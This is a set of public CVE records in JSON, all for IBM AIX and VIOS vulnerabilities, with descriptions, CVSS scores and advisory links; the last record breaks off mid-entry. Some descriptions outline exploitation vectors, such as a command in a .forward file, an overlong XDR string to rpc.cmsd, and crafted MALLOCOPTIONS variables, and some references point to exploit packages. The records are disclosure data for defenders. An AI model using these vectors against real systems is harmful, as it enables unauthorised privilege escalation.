{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T11:46:23.878Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1690" }, { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6983236" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/248421" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-26286", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-08-01T16:08:19.598784Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-01T16:08:30.984Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX runtime services library to execute arbitrary commands. IBM X-Force ID: 248421." } ], "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX runtime services library to execute arbitrary commands. IBM X-Force ID: 248421." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "description": "264 Permissions, Privileges, Access Controls", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-12T03:15:17.732918Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6983236" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/248421" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX privilege escalation", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-26286", "datePublished": "2023-04-26T11:50:34.674Z", "dateReserved": "2023-02-21T13:55:50.151Z", "dateUpdated": "2024-08-02T11:46:23.878Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2012-2200
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securitytracker.com/id?1027207 | vdb-entry, x_refsource_SECTRACK | |
http://www.ibm.com/support/docview.wss?uid=isg1IV22965 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV22963 | vendor-advisory, x_refsource_AIXAPAR | |
http://aix.software.ibm.com/aix/efixes/security/sendmail1_advisory.asc | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/76466 | vdb-entry, x_refsource_XF | |
http://www.ibm.com/support/docview.wss?uid=isg1IV22964 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV22966 | vendor-advisory, x_refsource_AIXAPAR |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T19:26:09.009Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "1027207", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id?1027207" }, { "name": "IV22965", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22965" }, { "name": "IV22963", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22963" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/sendmail1_advisory.asc" }, { "name": "aix-sendmail-command-execution(76466)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/76466" }, { "name": "IV22964", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22964" }, { "name": "IV22966", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22966" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2012-06-26T00:00:00", "descriptions": [ { "lang": "en", "value": "The default configuration of sendmail in IBM AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, allows local users to gain privileges by entering a command in a .forward file in a home directory." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-28T12:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "1027207", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id?1027207" }, { "name": "IV22965", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22965" }, { "name": "IV22963", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22963" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/sendmail1_advisory.asc" }, { "name": "aix-sendmail-command-execution(76466)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/76466" }, { "name": "IV22964", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22964" }, { "name": "IV22966", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22966" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2012-2200", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The default configuration of sendmail in IBM AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, allows local users to gain privileges by entering a command in a .forward file in a home directory." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "1027207", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id?1027207" }, { "name": "IV22965", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22965" }, { "name": "IV22963", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22963" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/sendmail1_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/sendmail1_advisory.asc" }, { "name": "aix-sendmail-command-execution(76466)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/76466" }, { "name": "IV22964", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22964" }, { "name": "IV22966", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22966" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2012-2200", "datePublished": "2012-06-27T10:00:00", "dateReserved": "2012-04-04T00:00:00", "dateUpdated": "2024-08-06T19:26:09.009Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38991
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6538952 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/212953 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:58:17.485Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6538952" }, { "name": "ibm-aix-cve202138991-code-exec (212953)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212953" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] }, { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] } ], "datePublic": "2022-01-10T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.0, 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the lscore command which could lead to code execution. IBM X-Force ID: 212953." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 7.3, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.0/PR:N/A:H/S:U/AV:L/C:H/I:H/UI:N/AC:L/RC:C/RL:O/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-01-11T16:25:18", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6538952" }, { "name": "ibm-aix-cve202138991-code-exec (212953)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212953" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-01-10T00:00:00", "ID": "CVE-2021-38991", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } }, { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.0, 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the lscore command which could lead to code execution. IBM X-Force ID: 212953." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "H", "I": "H", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Privileges" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6538952", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6538952 (AIX)", "url": "https://www.ibm.com/support/pages/node/6538952" }, { "name": "ibm-aix-cve202138991-code-exec (212953)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212953" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-38991", "datePublished": "2022-01-11T16:25:18.300280Z", "dateReserved": "2021-08-16T00:00:00", "dateUpdated": "2024-09-16T18:48:29.444Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2009-3699
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-07T06:38:30.398Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "ADV-2009-2846", "tags": [ "vdb-entry", "x_refsource_VUPEN", "x_transferred" ], "url": "http://www.vupen.com/english/advisories/2009/2846" }, { "name": "IZ62237", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62237" }, { "name": "IZ62570", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62570" }, { "name": "IZ61628", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ61628" }, { "name": "1022996", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://securitytracker.com/id?1022996" }, { "name": "20091007 IBM AIX rpc.cmsd Stack Buffer Overflow Vulnerability", "tags": [ "third-party-advisory", "x_refsource_IDEFENSE", "x_transferred" ], "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc" }, { "name": "IZ62569", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62569" }, { "name": "ibm-aix-rpccmsd-bo(53681)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53681" }, { "name": "IZ62571", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62571" }, { "name": "IZ62123", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62123" }, { "name": "IZ62672", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62672" }, { "name": "IZ62572", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62572" }, { "name": "36978", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/36978" }, { "name": "IZ61717", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ61717" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.immunityinc.com/downloads/immpartners/aixcmsd10092009.tar.gz" }, { "name": "58726", "tags": [ "vdb-entry", "x_refsource_OSVDB", "x_transferred" ], "url": "http://www.osvdb.org/58726" }, { "name": "36615", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/36615" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2009-10-07T00:00:00", "descriptions": [ { "lang": "en", "value": "Stack-based buffer overflow in libcsa.a (aka the calendar daemon library) in IBM AIX 5.x through 5.3.10 and 6.x through 6.1.3, and VIOS 2.1 and earlier, allows remote attackers to execute arbitrary code via a long XDR string in the first argument to procedure 21 of rpc.cmsd." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-16T14:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "ADV-2009-2846", "tags": [ "vdb-entry", "x_refsource_VUPEN" ], "url": "http://www.vupen.com/english/advisories/2009/2846" }, { "name": "IZ62237", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62237" }, { "name": "IZ62570", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62570" }, { "name": "IZ61628", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ61628" }, { "name": "1022996", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://securitytracker.com/id?1022996" }, { "name": "20091007 IBM AIX rpc.cmsd Stack Buffer Overflow Vulnerability", "tags": [ "third-party-advisory", "x_refsource_IDEFENSE" ], "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc" }, { "name": "IZ62569", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62569" }, { "name": "ibm-aix-rpccmsd-bo(53681)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53681" }, { "name": "IZ62571", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62571" }, { "name": "IZ62123", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62123" }, { "name": "IZ62672", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62672" }, { "name": "IZ62572", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62572" }, { "name": "36978", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/36978" }, { "name": "IZ61717", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ61717" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.immunityinc.com/downloads/immpartners/aixcmsd10092009.tar.gz" }, { "name": "58726", "tags": [ "vdb-entry", "x_refsource_OSVDB" ], "url": "http://www.osvdb.org/58726" }, { "name": "36615", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/36615" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2009-3699", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Stack-based buffer overflow in libcsa.a (aka the calendar daemon library) in IBM AIX 5.x through 5.3.10 and 6.x through 6.1.3, and VIOS 2.1 and earlier, allows remote attackers to execute arbitrary code via a long XDR string in the first argument to procedure 21 of rpc.cmsd." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "ADV-2009-2846", "refsource": "VUPEN", "url": "http://www.vupen.com/english/advisories/2009/2846" }, { "name": "IZ62237", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62237" }, { "name": "IZ62570", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62570" }, { "name": "IZ61628", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ61628" }, { "name": "1022996", "refsource": "SECTRACK", "url": "http://securitytracker.com/id?1022996" }, { "name": "20091007 IBM AIX rpc.cmsd Stack Buffer Overflow Vulnerability", "refsource": "IDEFENSE", "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc" }, { "name": "IZ62569", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62569" }, { "name": "ibm-aix-rpccmsd-bo(53681)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53681" }, { "name": "IZ62571", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62571" }, { "name": "IZ62123", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62123" }, { "name": "IZ62672", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62672" }, { "name": "IZ62572", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ62572" }, { "name": "36978", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/36978" }, { "name": "IZ61717", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ61717" }, { "name": "https://www.immunityinc.com/downloads/immpartners/aixcmsd10092009.tar.gz", "refsource": "MISC", "url": "https://www.immunityinc.com/downloads/immpartners/aixcmsd10092009.tar.gz" }, { "name": "58726", "refsource": "OSVDB", "url": "http://www.osvdb.org/58726" }, { "name": "36615", "refsource": "BID", "url": "http://www.securityfocus.com/bid/36615" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2009-3699", "datePublished": "2009-10-15T10:00:00", "dateReserved": "2009-10-14T00:00:00", "dateUpdated": "2024-08-07T06:38:30.398Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45175
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7105282 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/267973 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:14:19.860Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7105282" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267973" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the TCP/IP kernel extension to cause a denial of service. IBM X-Force ID: 267973." } ], "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the TCP/IP kernel extension to cause a denial of service. IBM X-Force ID: 267973." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T01:57:12.466Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7105282" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267973" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-45175", "datePublished": "2024-01-11T01:57:12.466Z", "dateReserved": "2023-10-05T01:38:58.206Z", "dateUpdated": "2024-08-02T20:14:19.860Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2014-3074
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T10:35:55.724Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "68296", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/68296" }, { "name": "20140708 CVE-2014-3074 - Runtime Linker Allows Privilege Escalation Via Arbitrary File Writes in IBM AIX", "tags": [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred" ], "url": "http://www.securityfocus.com/archive/1/532689/100/0/threaded" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3074/" }, { "name": "IV60940", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60940" }, { "name": "20140708 CVE-2014-3074 - Runtime Linker Allows Privilege Escalation Via Arbitrary File Writes in IBM AIX", "tags": [ "mailing-list", "x_refsource_FULLDISC", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2014/Jul/31" }, { "name": "1030504", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1030504" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/malloc_advisory.asc" }, { "name": "IV61311", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61311" }, { "name": "ibm-aix-cve20143074-priv-escalation(93816)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93816" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://packetstormsecurity.com/files/127390/IBM-AIX-Runtime-Linker-Privilege-Escalation.html" }, { "name": "IV60935", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60935" }, { "name": "IV61315", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61315" }, { "name": "59344", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/59344" }, { "name": "IV61313", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61313" }, { "name": "IV61314", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61314" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2014-06-30T00:00:00", "descriptions": [ { "lang": "en", "value": "The runtime linker in IBM AIX 6.1 and 7.1 and VIOS 2.2.x allows local users to create a mode-666 root-owned file, and consequently gain privileges, by setting crafted MALLOCOPTIONS and MALLOCBUCKETS environment-variable values and then executing a setuid program." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-09T18:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "68296", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/68296" }, { "name": "20140708 CVE-2014-3074 - Runtime Linker Allows Privilege Escalation Via Arbitrary File Writes in IBM AIX", "tags": [ "mailing-list", "x_refsource_BUGTRAQ" ], "url": 